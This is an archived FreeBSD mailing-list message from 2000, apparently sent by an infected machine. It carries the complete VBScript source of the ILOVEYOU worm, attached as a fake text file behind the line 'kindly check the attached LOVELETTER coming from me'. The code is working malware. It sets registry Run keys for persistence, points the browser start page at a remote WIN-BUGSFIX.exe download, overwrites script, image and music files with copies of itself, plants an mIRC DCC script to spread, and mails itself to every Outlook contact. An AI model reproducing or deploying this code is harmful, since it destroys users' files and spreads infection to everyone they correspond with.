Date: Thu, 4 May 2000 14:27:59 +0200 From: "Lennart Blomstrom" <blomman@servicefactory.com> To: "'E-mail'" <freebsd-hackers@FreeBSD.ORG> Subject: ILOVEYOU Message-ID: <007701bfb5c6$6073d820$0a0f010a@k9d4>
next in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format.
------=_NextPart_000_0078_01BFB5D7.23FCA820
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
kindly check the attached LOVELETTER coming from me.
------=_NextPart_000_0078_01BFB5D7.23FCA820
Content-Type: application/octet-stream;
name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
rem barok -loveletter(vbe) <i hate go to school>=0Drem by: spyder / =
ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines=0DOn =
Error Resume Next=0Ddim =
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow=0Deq=3D""=0Dctr=3D0=0D=
Set fso =3D CreateObject("Scripting.FileSystemObject")=0Dset file =3D =
fso.OpenTextFile(WScript.ScriptFullname,1)=0Dvbscopy=3Dfile.ReadAll=0Dmai=
n()=0Dsub main()=0DOn Error Resume Next=0Ddim wscr,rr=0Dset =
wscr=3DCreateObject("WScript.Shell")=0Drr=3Dwscr.RegRead("HKEY_CURRENT_US=
ER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")=0Dif =
(rr>=3D1) then=0Dwscr.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"=0Dend if=0DSet dirwin =3D =
fso.GetSpecialFolder(0)=0DSet dirsystem =3D =
fso.GetSpecialFolder(1)=0DSet dirtemp =3D fso.GetSpecialFolder(2)=0DSet =
c =3D =
fso.GetFile(WScript.ScriptFullName)=0Dc.Copy(dirsystem&"\MSKernel32.vbs")=
=0Dc.Copy(dirwin&"\Win32DLL.vbs")=0Dc.Copy(dirsystem&"\LOVE-LETTER-FOR-YO=
U.TXT.vbs")=0Dregruns()=0Dhtml()=0Dspreadtoemail()=0Dlistadriv()=0Dend =
sub=0Dsub regruns()=0DOn Error Resume Next=0DDim =
num,downread=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
l32",dirsystem&"\MSKernel32.vbs"=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
\Win32DLL",dirwin&"\Win32DLL.vbs"=0Ddownread=3D""=0Ddownread=3Dregget("HK=
EY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download =
Directory")=0Dif (downread=3D"") then=0Ddownread=3D"c:\"=0Dend if=0Dif =
(fileexist(dirsystem&"\WinFAT32.exe")=3D1) then=0DRandomize=0Dnum =3D =
Int((4 * Rnd) + 1)=0Dif num =3D 1 then=0Dregcreate =
"HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"=0Delseif num =3D 2 =
then=0Dregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"=0Delseif num =3D 3 =
then=0Dregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"=0Delseif num =3D 4 then=0Dregcreate =
"HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
UGSFIX.exe"=0Dend if=0Dend if=0Dif =
(fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG=
SFIX",downread&"\WIN-BUGSFIX.exe"=0Dregcreate =
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start =
Page","about:blank"=0Dend if=0Dend sub=0Dsub listadriv=0DOn Error Resume =
Next=0DDim d,dc,s=0DSet dc =3D fso.Drives=0DFor Each d in dc=0DIf =
d.DriveType =3D 2 or d.DriveType=3D3 Then=0Dfolderlist(d.path&"\")=0Dend =
if=0DNext=0Dlistadriv =3D s=0Dend sub=0Dsub infectfiles(folderspec) =
=0DOn Error Resume Next=0Ddim f,f1,fc,ext,ap,mircfname,s,bname,mp3=0Dset =
f =3D fso.GetFolder(folderspec)=0Dset fc =3D f.Files=0Dfor each f1 in =
fc=0Dext=3Dfso.GetExtensionName(f1.path)=0Dext=3Dlcase(ext)=0Ds=3Dlcase(f=
1.name)=0Dif (ext=3D"vbs") or (ext=3D"vbe") then=0Dset =
ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Delseif(ext=3D"js") or (ext=3D"jse") or =
(ext=3D"css") or (ext=3D"wsh") or (ext=3D"sct") or (ext=3D"hta") =
then=0Dset ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Dbname=3Dfso.GetBaseName(f1.path)=0Dset =
cop=3Dfso.GetFile(f1.path)=0Dcop.copy(folderspec&"\"&bname&".vbs")=0Dfso.=
DeleteFile(f1.path)=0Delseif(ext=3D"jpg") or (ext=3D"jpeg") then=0Dset =
ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Dset =
cop=3Dfso.GetFile(f1.path)=0Dcop.copy(f1.path&".vbs")=0Dfso.DeleteFile(f1=
.path)=0Delseif(ext=3D"mp3") or (ext=3D"mp2") then=0Dset =
mp3=3Dfso.CreateTextFile(f1.path&".vbs")=0Dmp3.write =
vbscopy=0Dmp3.close=0Dset =
att=3Dfso.GetFile(f1.path)=0Datt.attributes=3Datt.attributes+2=0Dend =
if=0Dif (eq<>folderspec) then=0Dif (s=3D"mirc32.exe") or =
(s=3D"mlink32.exe") or (s=3D"mirc.ini") or (s=3D"script.ini") or =
(s=3D"mirc.hlp") then=0Dset =
scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")=0Dscriptini.Writ=
eLine "[script]"=0Dscriptini.WriteLine ";mIRC =
Script"=0Dscriptini.WriteLine "; Please dont edit this script... mIRC =
will corrupt, if mIRC will"=0Dscriptini.WriteLine " corrupt... =
WINDOWS will affect and will not run correctly. =
thanks"=0Dscriptini.WriteLine ";"=0Dscriptini.WriteLine ";Khaled =
Mardam-Bey"=0Dscriptini.WriteLine =
";http://www.mirc.com"=0Dscriptini.WriteLine ";"=0Dscriptini.WriteLine =
"n0=3Don 1:JOIN:#:{"=0Dscriptini.WriteLine "n1=3D /if ( $nick =3D=3D =
$me ) { halt }"=0Dscriptini.WriteLine "n2=3D /.dcc send $nick =
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"=0Dscriptini.WriteLine =
"n3=3D}"=0Dscriptini.close=0Deq=3Dfolderspec=0Dend if=0Dend if=0Dnext =
=0Dend sub=0Dsub folderlist(folderspec) =0DOn Error Resume Next=0Ddim =
f,f1,sf=0Dset f =3D fso.GetFolder(folderspec) =0Dset sf =3D =
f.SubFolders=0Dfor each f1 in =
sf=0Dinfectfiles(f1.path)=0Dfolderlist(f1.path)=0Dnext =0Dend sub=0Dsub =
regcreate(regkey,regvalue)=0DSet regedit =3D =
CreateObject("WScript.Shell")=0Dregedit.RegWrite regkey,regvalue=0Dend =
sub=0Dfunction regget(value)=0DSet regedit =3D =
CreateObject("WScript.Shell")=0Dregget=3Dregedit.RegRead(value)=0Dend =
function=0Dfunction fileexist(filespec)=0DOn Error Resume Next=0Ddim =
msg=0Dif (fso.FileExists(filespec)) Then=0Dmsg =3D 0=0Delse=0Dmsg =3D =
1=0Dend if=0Dfileexist =3D msg=0Dend function=0Dfunction =
folderexist(folderspec)=0DOn Error Resume Next=0Ddim msg=0Dif =
(fso.GetFolderExists(folderspec)) then=0Dmsg =3D 0=0Delse=0Dmsg =3D =
1=0Dend if=0Dfileexist =3D msg=0Dend function=0Dsub spreadtoemail()=0DOn =
Error Resume Next=0Ddim =
x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad=0Dset =
regedit=3DCreateObject("WScript.Shell")=0Dset =
out=3DWScript.CreateObject("Outlook.Application")=0Dset =
mapi=3Dout.GetNameSpace("MAPI")=0Dfor ctrlists=3D1 to =
mapi.AddressLists.Count=0Dset =
a=3Dmapi.AddressLists(ctrlists)=0Dx=3D1=0Dregv=3Dregedit.RegRead("HKEY_CU=
RRENT_USER\Software\Microsoft\WAB\"&a)=0Dif (regv=3D"") =
then=0Dregv=3D1=0Dend if=0Dif (int(a.AddressEntries.Count)>int(regv)) =
then=0Dfor ctrentries=3D1 to =
a.AddressEntries.Count=0Dmalead=3Da.AddressEntries(x)=0Dregad=3D""=0Drega=
d=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)=0D=
if (regad=3D"") then=0Dset =
male=3Dout.CreateItem(0)=0Dmale.Recipients.Add(malead)=0Dmale.Subject =
=3D "ILOVEYOU"=0Dmale.Body =3D vbcrlf&"kindly check the attached =
LOVELETTER coming from =
me."=0Dmale.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")=0Dm=
ale.Send=0Dregedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"=0Dend =
if=0Dx=3Dx+1=0Dnext=0Dregedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count=0Del=
se=0Dregedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count=0Den=
d if=0Dnext=0DSet out=3DNothing=0DSet mapi=3DNothing=0Dend sub=0Dsub =
html=0DOn Error Resume Next=0Ddim =
lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6=0Ddta1=3D"<HTML><HEAD><TITLE=
>LOVELETTER - HTML<?-?TITLE><META NAME=3D@-@Generator@-@ =
CONTENT=3D@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _=0D"<META =
NAME=3D@-@Author@-@ CONTENT=3D@-@spyder ?-? ispyder@mail.com ?-? =
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& =
_=0D"<META NAME=3D@-@Description@-@ CONTENT=3D@-@simple but i think this =
is good...@-@>"&vbcrlf& _=0D"<?-?HEAD><BODY =
ONMOUSEOUT=3D@-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-Y=
OU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& =
_=0D"ONKEYDOWN=3D@-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-F=
OR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D@-@fixed@-@ =
BGCOLOR=3D@-@#FF9933@-@>"&vbcrlf& _=0D"<CENTER><p>This HTML file need =
ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please =
press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& =
_=0D"<?-?CENTER><MARQUEE LOOP=3D@-@infinite@-@ =
BGCOLOR=3D@-@yellow@-@>----------z--------------------z----------<?-?MARQ=
UEE> "&vbcrlf& _=0D"<?-?BODY><?-?HTML>"&vbcrlf& _=0D"<SCRIPT =
language=3D@-@JScript@-@>"&vbcrlf& _=0D"<!--?-??-?"&vbcrlf& _=0D"if =
(window.screen){var wi=3Dscreen.availWidth;var =
hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcr=
lf& _=0D"?-??-?-->"&vbcrlf& _=0D"<?-?SCRIPT>"&vbcrlf& _=0D"<SCRIPT =
LANGUAGE=3D@-@VBScript@-@>"&vbcrlf& _=0D"<!--"&vbcrlf& _=0D"on error =
resume next"&vbcrlf& _=0D"dim =
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& =
_=0D"aw=3D1"&vbcrlf& _=0D"code=3D"=0Ddta2=3D"set =
fso=3DCreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _=0D"set =
dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& =
_=0D"code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& =
_=0D"code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& =
_=0D"code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& =
_=0D"set =
wri=3Dfso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& =
_=0D"wri.write code4"&vbcrlf& _=0D"wri.close"&vbcrlf& _=0D"if =
(fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& =
_=0D"if (err.number=3D424) then"&vbcrlf& _=0D"aw=3D0"&vbcrlf& _=0D"end =
if"&vbcrlf& _=0D"if (aw=3D1) then"&vbcrlf& _=0D"document.write @-@ERROR: =
can#-#t initialize ActiveX@-@"&vbcrlf& _=0D"window.close"&vbcrlf& =
_=0D"end if"&vbcrlf& _=0D"end if"&vbcrlf& _=0D"Set regedit =3D =
CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _=0D"regedit.RegWrite =
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-=
^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& =
_=0D"?-??-?-->"&vbcrlf& =
_=0D"<?-?SCRIPT>"=0Ddt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")=0Ddt1=
=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")=0Ddt4=3Dreplace(dt1,chr(63)&=
chr(45)&chr(63),"/")=0Ddt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")=0Dd=
t2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")=0Ddt2=3Dreplace(dt2,chr(64=
)&chr(45)&chr(64),"""")=0Ddt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")=0D=
dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")=0Dset =
fso=3DCreateObject("Scripting.FileSystemObject")=0Dset =
c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)=0Dlines=3DSplit(c.ReadAll,=
vbcrlf)=0Dl1=3Dubound(lines)=0Dfor n=3D0 to =
ubound(lines)=0Dlines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))=0D=
lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))=0Dlines(n)=3Dre=
place(lines(n),"\",chr(37)+chr(45)+chr(37))=0Dif (l1=3Dn) =
then=0Dlines(n)=3Dchr(34)+lines(n)+chr(34)=0Delse=0Dlines(n)=3Dchr(34)+li=
nes(n)+chr(34)&"&vbcrlf& _"=0Dend if=0Dnext=0Dset =
b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")=0Db.close=0D=
set =
d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)=0Dd.write =
dt5=0Dd.write join(lines,vbcrlf)=0Dd.write vbcrlf=0Dd.write =
dt6=0Dd.close=0Dend sub=0D
------=_NextPart_000_0078_01BFB5D7.23FCA820--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?007701bfb5c6$6073d820$0a0f010a>